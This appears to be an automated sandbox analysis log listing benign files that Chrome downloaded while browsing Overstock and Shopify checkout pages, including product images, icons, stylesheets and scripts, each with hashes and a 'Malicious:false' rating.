                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/SAFAVIEH-Amelia-Lorella-Abstract-Rug_f55a63eb-3968-4cd1-9451-da093f0ddb73.jpg?v=1715196797&width=320
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@.......................................................................................Y.)./...L^..Q.x<.... &~~.....q..s7.k.....i.Aq..q...]=.[BFh.....P.,.?).$..N.....z.4...x<...Y....5..V..3|.|Zi)zk}vVEk...L....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):43
                                                                                                                                                          Entropy (8bit):4.301508290129998
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:AD8B6F08655797587CDEC719A94EFE59
                                                                                                                                                          SHA1:182ADF5A140796F81E930649D05654DBF22FD5B7
                                                                                                                                                          SHA-256:77D5FE96DEFD6C8C1E3B0466B4827CF83DC7E5C727A10177E115D25132FA86F6
                                                                                                                                                          SHA-512:519A8EA7CE2ED8661CC72D58BC0C02E721EF8E64608F4D2E26A56A970D43EBBF21BDF579C543EE1DFD667DA8F87467C60111A3E6D246D435A5C2D066AB88EFA3
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:window['google_noFurtherRedirects'] = true;
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1471
                                                                                                                                                          Entropy (8bit):4.5475358436836135
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:F3DDA33BF5FB24583534BD41E758FB25
                                                                                                                                                          SHA1:2FD3D57ED95BCD3D004D5F94BB7431C0BB7180A8
                                                                                                                                                          SHA-256:64BA853ACB4A3F8358656E2AFBEA7A40B1832B4F902BA082B61DD9A2B555D09B
                                                                                                                                                          SHA-512:19EED73C1FA43632D2F57EA650FBF68450D22AA18E5A08287F5835303B29084C450F7E80C08AE9451B67F52072EE2E8BED156CB4CE7C0168EAD1AE519A58A3CE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://ak1.ostkcdn.com/img/mxc/star-25.svg
                                                                                                                                                          Preview:<svg width="14" height="14" viewBox="0 0 14 14" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_393_920)">.<path d="M5.4365 4.77644L7 0.965174L8.5635 4.77644C8.66194 5.01641 8.88513 5.19598 9.159 5.22265L13.1482 5.61105L10.1207 8.40306C9.92635 8.58228 9.84785 8.84948 9.90151 9.0994L10.7802 13.192L7.37658 11.0705C7.1456 10.9265 6.8544 10.9265 6.62342 11.0705L3.21981 13.192L4.09849 9.09941C4.15215 8.84948 4.07365 8.58228 3.87932 8.40306L0.851766 5.61105L4.84099 5.22265C5.11487 5.19598 5.33806 5.01641 5.4365 4.77644Z" stroke="#252525"/>.<path d="M5.4365 4.77644L7 0.965174L8.5635 4.77644C8.66194 5.01641 8.88513 5.19598 9.159 5.22265L13.1482 5.61105L10.1207 8.40306C9.92635 8.58228 9.84785 8.84948 9.90151 9.0994L10.7802 13.192L7.37658 11.0705C7.1456 10.9265 6.8544 10.9265 6.62342 11.0705L3.21981 13.192L4.09849 9.09941C4.15215 8.84948 4.07365 8.58228 3.87932 8.40306L0.851766 5.61105L4.84099 5.22265C5.11487 5.19598 5.33806 5.01641 5.4365 4.77644Z" stroke="#252525"/>.<p
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (5381)
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5476
                                                                                                                                                          Entropy (8bit):5.143086318750087
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:51A57F2161AAEDE8D2490F91F2C6A09A
                                                                                                                                                          SHA1:E105EA0B77283D3B5EE4655964C15FDC6B8D2648
                                                                                                                                                          SHA-256:B90D8EB604426456E2DF7FC9955A7C52DFC74C8A501CD4F154A1AAB564405395
                                                                                                                                                          SHA-512:F601694BF363261E8A3974FDEED3987031CB7E1DD27022BFEF41EE3EA72289F1FB2388A02C653D17E4F77F8170132B1F8EB63E4F28CF411C2D38765FF6BB385E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:/*! instant.page v5.2.0 - (C) 2019-2023 Alexandre Dieulot - https://instant.page/license */let _chromiumMajorVersionInUserAgent=null,_allowQueryString,_allowExternalLinks,_useWhitelist,_delayOnHover=65,_lastTouchTimestamp,_mouseoverTimer,_preloadedList=new Set;const DELAY_TO_NOT_BE_CONSIDERED_A_TOUCH_INITIATED_ACTION=1111;init();function init(){if(!document.createElement("link").relList.supports("prefetch"))return;const handleVaryAcceptHeader="instantVaryAccept"in document.body.dataset||"Shopify"in window,chromiumUserAgentIndex=navigator.userAgent.indexOf("Chrome/");if(chromiumUserAgentIndex>-1&&(_chromiumMajorVersionInUserAgent=parseInt(navigator.userAgent.substring(chromiumUserAgentIndex+7))),handleVaryAcceptHeader&&_chromiumMajorVersionInUserAgent&&_chromiumMajorVersionInUserAgent<110)return;const mousedownShortcut="instantMousedownShortcut"in document.body.dataset;_allowQueryString="instantAllowQueryString"in document.body.dataset,_allowExternalLinks="instantAllowExternalLinks"in d
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):38064
                                                                                                                                                          Entropy (8bit):7.985044282381505
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:D46EB6CA07673E202E74BE36D4FE2B1A
                                                                                                                                                          SHA1:D8A60A8E388D74687374AD87712A2E058D1E7C41
                                                                                                                                                          SHA-256:672DBEF4B5659E587395507CEADF206128E09E7B1D1824B249434BD6FC2B7385
                                                                                                                                                          SHA-512:1B5207D1ECD146F32988DDFD9178A054C0E6D3B964A0F7FF7DA3A01FFB927D51B472D3C3CA10863A0889B582CC37107C166308C358BACD511650830CF0350E22
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/SAFAVIEH-Handmade-Novelty-Sheyla-Ornate-Flower-Wool-Rug_a5e01361-3fe0-477d-91ef-fdbed8fe6004.jpg?v=1715132695&width=320
                                                                                                                                                          Preview:RIFF....WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 ....Pf...*@.@.>5..B.!!...< .D..`'......_....}#...>E.{..........................?.......Y.w.[....>........_......................./.....?..........o..io.....~N.........5.....?...?k.....@8.......$...?.?v..{q..............?......?.O..*.k...?......A.=...[........3.?....U.......~.A.c...e........._._\..x&~....'.......?....l...........~......'.......=......M......._.......y&..X=...;..oIX_...z.E....j...a$o.p.n...c..UK.....&.*...a...C.f.."...^.z.....^)K`.F.z.......j..4.._..k.F..B.n..2..%..S...b....+....<....aMD..<......
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (666)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):765
                                                                                                                                                          Entropy (8bit):5.238466142910574
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:6D85458FA8418A32DEB7AF4A78E86019
                                                                                                                                                          SHA1:4CE04D5924F178C5D247639430A7F5B11224F75E
                                                                                                                                                          SHA-256:F5A47E5F1B22C7E94892E7C85FC6A2067883F591DE1690834066B8EF40892FA3
                                                                                                                                                          SHA-512:780B75D7E56290F49CC8998BBD50C6128A1AE1A467DF5EAC486F8AEF026B0792B736A616C11DBE0B82A215B30CD365FF0FCEC887CFC24E523538FD57C4DB1204
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/t/211/assets/os-master.css?v=155069223386330419261729142870
                                                                                                                                                          Preview:.aa-Autocomplete{width:100%}#header .aa-Input{border:none}#header .aa-Input::placeholder{color:#626669}.aa-DetachedSearchButtonPlaceholder{color:#626669}#header .aa-SubmitButton{display:flex;align-items:center;justify-content:center;background-color:#ac1b25;padding-left:0;padding-right:0;top:0;right:0;height:100%;cursor:pointer}#header .aa-Label svg{color:rgb(var(--color-background))}#header .aa-ClearButton{background:rgb(var(--color-background));z-index:9;width:47px}.price-sale s{color:#252525!important}.price-sale s:after{transform:rotate(0)!important}.card .card__title a:after{position:absolute;content:"";display:block;height:100%;width:100%;top:0;left:0}./*# sourceMappingURL=/cdn/shop/t/211/assets/os-master.css.map?v=155069223386330419261729142870 */.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2020)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2132
                                                                                                                                                          Entropy (8bit):5.410679126678075
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:F813CFFB4FA9C6D907E35310786BDFF8
                                                                                                                                                          SHA1:F6BF3E9F1BF4C89AB17872CD4BAB0EA015EFD640
                                                                                                                                                          SHA-256:83514C2C7D6AF433C7F4643A0A8307172E14C7CCE38AFD2EF8E7C995073B13E7
                                                                                                                                                          SHA-512:94B5CC4B36BAEABE111BD20A2D17689DCA5BF1EBFC45A724DBA013ED9725CE80ED2570E7583337197F53F5BD2890DCEBA06E5F793FAE6950D5BB1CB72C28CB2C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/t/211/assets/featured-collection-vsearch.js?v=56585624430427458651729142870
                                                                                                                                                          Preview:window.VSEARCH_UTILS=function(){const requires=["products"],ranges=["price"],restrictions=["brand","promotion"],nonFacetKeys=["q","page","selectedSort","maxPerPage","taxonomyId"];function buildAttributes(input){const attributes={};return Object.keys(input).forEach(key=>{!restrictions.includes(key)&&!ranges.includes(key)&&!nonFacetKeys.includes(key)&&(attributes[key]={id:key,values:Array.isArray(input[key])?input[key]:[input[key]]})}),attributes}function getDeviceType(){const userAgent=navigator.userAgent.toLowerCase();return/mobile|android|iphone|ipod|blackberry|iemobile|opera mini/i.test(userAgent)||window.innerWidth<=600?"MOBILE_WEB":"DESKTOP"}function sanitize(url){const parser=document.createElement("a");parser.href=url;const protocol="https:",host=parser.host.replace(/[^a-zA-Z0-9.-]/g,""),pathname=parser.pathname.replace(/[^a-zA-Z0-9\/._-]/g,""),search=parser.search.replace(/[^a-zA-Z0-9&=_-]/g,"");return`${protocol}//${host}${pathname}${search}`}return{prepareRequestBodyParams:fun
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (40076)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):40078
                                                                                                                                                          Entropy (8bit):5.407625415271603
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:315D720C82C1AE2BA602F717C32E9B29
                                                                                                                                                          SHA1:EF14E71CE25C15D9912FA1237F4138106E679121
                                                                                                                                                          SHA-256:A16B5077E54266C685F1F8FA49EB1DEB5E9718579CDFFE81CD1D0D6645515FFF
                                                                                                                                                          SHA-512:A7599597EFFCDE4C81B1D46B346279BE3DA27E09389B9B0ECD01649ECD546EA78E7DE360BF47A5E8EE5D3FAF90163CDCC72735678CAEE07E738EF79CD5777BC8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/polyfills.IegWBDja.js
                                                                                                                                                          Preview:var r="undefined"!=typeof globalThis?globalThis:"undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},t=function(r){return r&&r.Math===Math&&r},e=t("object"==typeof globalThis&&globalThis)||t("object"==typeof window&&window)||t("object"==typeof self&&self)||t("object"==typeof r&&r)||t("object"==typeof r&&r)||function(){return this}()||Function("return this")(),n={},o=function(r){try{return!!r()}catch(t){return!0}},i=!o((function(){return 7!==Object.defineProperty({},1,{get:function(){return 7}})[1]})),a=!o((function(){var r=function(){}.bind();return"function"!=typeof r||r.hasOwnProperty("prototype")})),u=a,c=Function.prototype.call,f=u?c.bind(c):function(){return c.apply(c,arguments)},s={},p={}.propertyIsEnumerable,h=Object.getOwnPropertyDescriptor,l=h&&!p.call({1:2},1);s.f=l?function(r){var t=h(this,r);return!!t&&t.enumerable}:p;var y,d,v=function(r,t){return{enumerable:!(1&r),configurable:!(2&r),writable:!(4&r),value:t}},g=a,w=Function.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (12875), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):12875
                                                                                                                                                          Entropy (8bit):5.229604496973644
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:F34D38C90923A3CF0A95695C11A3169B
                                                                                                                                                          SHA1:EDCCC3165018181940C8F5C509B596AE1F5BC635
                                                                                                                                                          SHA-256:EFF2497F10D71BBCD02C4372EFD22F3C7D74ED699A57073CCF912BD23CECACF4
                                                                                                                                                          SHA-512:EDFC5F14B2E266904E17841ED0BAE77E693DFC9CBDB2678718EB9FB166D6D6B49AF30134B925D0050F770730A2925F7CBC14096BF5B4F40262B10B46FD235CC8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shopifycloud/shopify/assets/storefront/load_feature-eff2497f10d71bbcd02c4372efd22f3c7d74ed699a57073ccf912bd23cecacf4.js
                                                                                                                                                          Preview:!function(){var e=function(e){var t={exports:{}};return e.call(t.exports,t,t.exports),t.exports},t=function(){function e(e,t){var r=[],o=!0,a=!1,n=void 0;try{for(var i,s=e[Symbol.iterator]();!(o=(i=s.next()).done)&&(r.push(i.value),!t||r.length!==t);o=!0);}catch(e){a=!0,n=e}finally{try{!o&&s.return&&s.return()}finally{if(a)throw n}}return r}return function(t,r){if(Array.isArray(t))return t;if(Symbol.iterator in Object(t))return e(t,r);throw new TypeError("Invalid attempt to destructure non-iterable instance")}}(),r=function(e){return e&&e.__esModule?e:{default:e}},o=function(e){if(Array.isArray(e)){for(var t=0,r=Array(e.length);t<e.length;t++)r[t]=e[t];return r}return Array.from(e)},a=e((function(e,t){"use strict";function r(e){"loading"!==document.readyState?e():document.addEventListener?document.addEventListener("DOMContentLoaded",e):document.attachEvent("onreadystatechange",(function(){"loading"!==document.readyState&&e()}))}Object.defineProperty(t,"__esModule",{value:!0}),t.default
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 320 x 320, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):55053
                                                                                                                                                          Entropy (8bit):7.985001129159105
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:2A2373FCFE3B45EB5CFE145C73A43828
                                                                                                                                                          SHA1:AC15E026C75F6AB9ED8DD60F5EFB70417EE0EA82
                                                                                                                                                          SHA-256:B071137C352ED6DE46C61F558B7A4FEB93FA6505E3692C67D8E28C53885E5FCD
                                                                                                                                                          SHA-512:ED472EFE8109141EB6EBB6421D902875CFC4B48A832B192E969F5A8010B63A49F075046CE28CC511C293F5F2ED41EAB62E59B56F090828870603C862151C8193
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:.PNG........IHDR...@...@............iCCPicc....c``\...[.$....WR........~...A...A..21...1 ...'.v...D_....@..LI-Nf``......\PT...........```.)...b``....!...;...V..............NBbC....d..Ld.$...A.R.....O2'.N....&`/.(m..Qs....$7......U...g..._{..K...KR+J@.....@a..6...E..._...' .f20loe`....SY........<...M...Ft....eXIfII*...........................V...........^...(.......................i.......f.......x2......x2................0210....................0100....................@...........@.......n.1.....pHYs...%...%.IR$... .IDATx..w|.....wfvUV]..+..Z(/..B..!.j...B7..\06....I.-.B.....!.^B..7.Z..;s....;.Z..%....,....<{.s...A..m(....!.../.P]..........@.0.(.*.J..b.U..*....B)U....8.......T..7j.|.4...j.:..6c.MB.F.T........k..\).L....v..`.?...X_#|...R.....vA...Yl.m...0..i.n(P.s(x.........qQ3u1.7..I..H..*._@.y. ,..<@ l+..Y...F`..=...5......P..j...l..BP..0.u-..du.\.2.....;..M...."+{...*?...[B...R %.q....=.f......M........E..'..N.p.=.}&].c+!D..-.r.J.@...P).....S... m.B...m....`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Java source, ASCII text, with very long lines (3169)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3170
                                                                                                                                                          Entropy (8bit):5.3517953863718235
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:6AF2D5E3DE08F5A7F5F719BE66D15B30
                                                                                                                                                          SHA1:D9EFB830F5C3AB71A59DD4EAB780ADD1BF4DA12A
                                                                                                                                                          SHA-256:247CA26DD9AC4051DA4798B1A9AAD32AE2A89311F30A8850C6F2309E467D7EEE
                                                                                                                                                          SHA-512:EC5E7553A90ACDD9E4F4C13D4123EEF1A509E5DD61E623659DE224D67653F6A0763DA9916BBB2402D19E392F3471ECCF555E40C3DE23C7F6138B0CE5588A3DCF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/publishMessage.Zuhtx4a1.js
                                                                                                                                                          Preview:import{bw as _,bx as I,o as C,by as w,bz as L,t as F,bA as U,bB as b,bC as W,bD as f,bE as R,bF as v,bG as M,r as x,n as H,q as k,bH as B,y as D}from"./app.CRtF78CU.js";const E=_.Control,G=_.UnauthenticatedCheckout,V=_.UnauthenticatedCheckout,Q=[_.UnauthenticatedCheckout];function Y(){const{currentUrl:e}=I(),{type:r}=C(),t=e.searchParams.get(w),[d,o]=L([v,M]),l=F()!=null,i=U(),u=[b.DraftOrder,b.Simulated],c=W(e.search),n=c&&d||o,y=![f.ShopPayAsPaymentMethod,f.ShopPayInstallmentsAsPaymentMethod].includes(t),h=i&&y&&!u.includes(r)&&(!l||n),p=R({disabled:!h,key:"shop_pay_new_signup_login_variant",variants:Object.values(_)});return h?p||(c?d?V:E:o?G:E):E}const q=()=>{const{myshopifyDomain:e}=x(),{checkoutSessionIdentifier:r}=C(),t=H();return{exchangeSessionTokenForCookie:k(async({token:o,origin:l,analytics_trace_id:i,in_checkout_profile_preview:u})=>{const{primary:c}=B(),n=new URLSearchParams({token:o,origin:l,shopify_domain:e});r&&n.set("checkout_token",r),i&&n.set("analytics_trace_id",i)
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):30464
                                                                                                                                                          Entropy (8bit):7.977677023371418
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:D507AD61C2E651F6FBE50F336A74EA55
                                                                                                                                                          SHA1:EFBB374E669E9A053DCFD6D70D65E89D83410CBC
                                                                                                                                                          SHA-256:FD1BCAED372DD0A6BDFCC304DD4B46480A4350AF3C288924B082F8873998A974
                                                                                                                                                          SHA-512:9DF2C24622459EB916176153F4AA5FFA4CBCB80F33CF8F86A504CCDBCDEEDBCBAFB02C98B7E7D420DC7DC33DDA6A26AA75AAE64340EC5D3FD5B1292C6452839B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/SAFAVIEH-Amelia-Madlaina-Abstract-Rug_a2a0d072-1e7c-47ef-b996-5f2a2d7e3a3b.jpg?v=1728145642&width=320
                                                                                                                                                          Preview:RIFF.v..WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 ht..PW...*@.@.>9..C.!.!).k.@..efN....gF}..i....,z?..........?..........[.....?..../P...D...t...z~.......................P...<......u..{zb_.....'.?......s.O....x...........B.c...w.?j;......~..'...~....O.'.....w.......>....Z.................D...s...w..x?......q?...W...D{5Me...=....F.R.....+....%No..._<....nX.."..'.U.\.......?....1...-1v(....#..df...>...........U... ..tM..r.........t..[...I.......=.....7.".)....'....s@M.<.@..K.Yg9.A 4...5tN..hz.8.1n!../...(C?'.h}..S.~5..a+,rDy..@..:Z..(m9|3\..c..U.d.U.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):68
                                                                                                                                                          Entropy (8bit):4.553070246726259
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:F47933B7D95BF214CEBD5112CBA23CF7
                                                                                                                                                          SHA1:A1AED97E0EC3C4CAF0EBBE22B6B73EF6E31CAA66
                                                                                                                                                          SHA-256:6226BE667A498CB34735B3278954663684D4FACE7C6B3B9A5B51FC74118D87D5
                                                                                                                                                          SHA-512:F11A2BD03EA0EC08A86736F9E0211A168A2435C22D259000A031C210052CFE8484BFF9885962DCEB05BAF0FDA0E66D6E225D7DEBF7F5C5B10A25E4261EBC9681
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/DutyOptions.Bd1Z60K2.css
                                                                                                                                                          Preview:[dir=ltr] .LkR2o{text-align:right}[dir=rtl] .LkR2o{text-align:left}.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Java source, ASCII text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):21
                                                                                                                                                          Entropy (8bit):4.011365041826379
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:9F04282C5B3ECCA33E725626F894BFD5
                                                                                                                                                          SHA1:99CA782476CB7BFD553803F5BE308B090B096E3B
                                                                                                                                                          SHA-256:D366CB845818CB63FBA9D91C87D085CE44B2E6D7339B8CF30ADED4FA4EFA7EE9
                                                                                                                                                          SHA-512:5FED53394233BAE105AFFCEA2E34D2018168329DB8DCA4D152AA7429E0216E07B785B5AEC9A0298164DAA840D2558B64F8D402385159028759FFD4591652F606
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:import "./embed.js";.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):937
                                                                                                                                                          Entropy (8bit):4.686370289882632
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:4B749470E4CA393269CC20C139C554E5
                                                                                                                                                          SHA1:F5926C6F51C7248C600BABCCB76F2A98D9B95DD6
                                                                                                                                                          SHA-256:F11035ED318096E8A499831BE4CCAC73F01D215425F950336B79510E59395669
                                                                                                                                                          SHA-512:3EA82611C7BD3A436E309542D03F1D9A1850D34BBCE9B8CB425179A68B2CFDFB2D86FC0B139ED33B057A74A448165DC9DED564214BB1FADA969C7CECC7649CD2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://ak1.ostkcdn.com/img/mxc/star-full.svg
                                                                                                                                                          Preview:<svg width="14" height="14" viewBox="0 0 14 14" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_35_679)">.<path d="M6.78211 0.150521C6.86445 -0.0501734 7.13555 -0.0501738 7.21789 0.15052L9.02899 4.56477C9.06334 4.64848 9.13851 4.70581 9.22497 4.71423L13.7843 5.15808C13.9916 5.17826 14.0754 5.44889 13.919 5.59311L10.479 8.76512C10.4137 8.82527 10.385 8.91803 10.4041 9.00694L11.4109 13.6955C11.4566 13.9087 11.2373 14.0759 11.0583 13.9644L7.12112 11.5105C7.04646 11.464 6.95354 11.464 6.87887 11.5105L2.94171 13.9644C2.7627 14.0759 2.54338 13.9087 2.58915 13.6955L3.5959 9.00695C3.61499 8.91803 3.58628 8.82527 3.52104 8.76512L0.080984 5.59311C-0.0754184 5.44889 0.00835652 5.17826 0.215649 5.15808L4.77502 4.71423C4.86149 4.70581 4.93666 4.64848 4.97101 4.56477L6.78211 0.150521Z" fill="#2F3337"/>.</g>.<defs>.<clipPath id="clip0_35_679">.<rect width="14" height="14" fill="white"/>.</clipPath>.</defs>.</svg>.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):19982
                                                                                                                                                          Entropy (8bit):7.965565168269484
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:A72232C4C2C186E23EEDBA9BFC21134D
                                                                                                                                                          SHA1:898BA67594EE4698349574D9DE4294CA2B3E6D46
                                                                                                                                                          SHA-256:54B2B81744B235525D80DCFB2163DA866932ABB357ADFD49E3A9FABC1A3672A0
                                                                                                                                                          SHA-512:A12167EBAF3F7679B44614295CAA700F4C52FCC764494C8CE0853213F6068B0C2AFBE48213A3F81D491AF2C12AE4214D2DD1C4E4CCFBD7B59587767EBA984DA8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/collections/Ch_C3_A2teau-21.5_22-Right-Side-Faucet-Wall-Mount-Bathroom-Sink-with-Chrome-Towel-Bar.jpg?v=1710951880&width=320
                                                                                                                                                          Preview:RIFF.N..WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 vK..P....*@.@.>9..D"!.l?....Z[....t.e_$..q...?@gL.. <..6.>....,..........A.K....x/...?......%.....#....3.2>..K.I...B...+....../...?.}.|.....C~...~........o...{..Y.G.k.?././.?.|....#.K.;..d.G..c/..Y(..........k.B&Z/.0......].{.,PNY2....CE..4..^...|.n....!....w.^.n......3..z.i9..........L. ......0{..;2k.. .......Wz|.)p{&.t.N...2,.D._.>..?.....{..^..\..@.U...........,n.@....3......O...{g.."Z..g..so.^AW......J$\:.......q3.,...S..]..5.+u..r.T.3<....k.rnCs..!_..O...tu.P......k+. .C.=.N....X........|R..*....... v...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):16
                                                                                                                                                          Entropy (8bit):3.875
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:46DF3E5E2D15256CA16616EBFDA5427F
                                                                                                                                                          SHA1:BE8F9B307E458075DA0D43585A05F1D451469182
                                                                                                                                                          SHA-256:AF3248D0B278571EFF9A22F8ED1CEB54B70D202B44FD70ECA4CA13A5771CECC3
                                                                                                                                                          SHA-512:88FBCC0A92317A0BADE7D4B72C023A16792F3728443075BF4B1767C8A55258836B54D56B24EABE36AE4EF240F796B58B8F1EA10C7E3C146BDE89882FC9ADE302
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAnMl5DOrngEaBIFDZFhlU4=?alt=proto
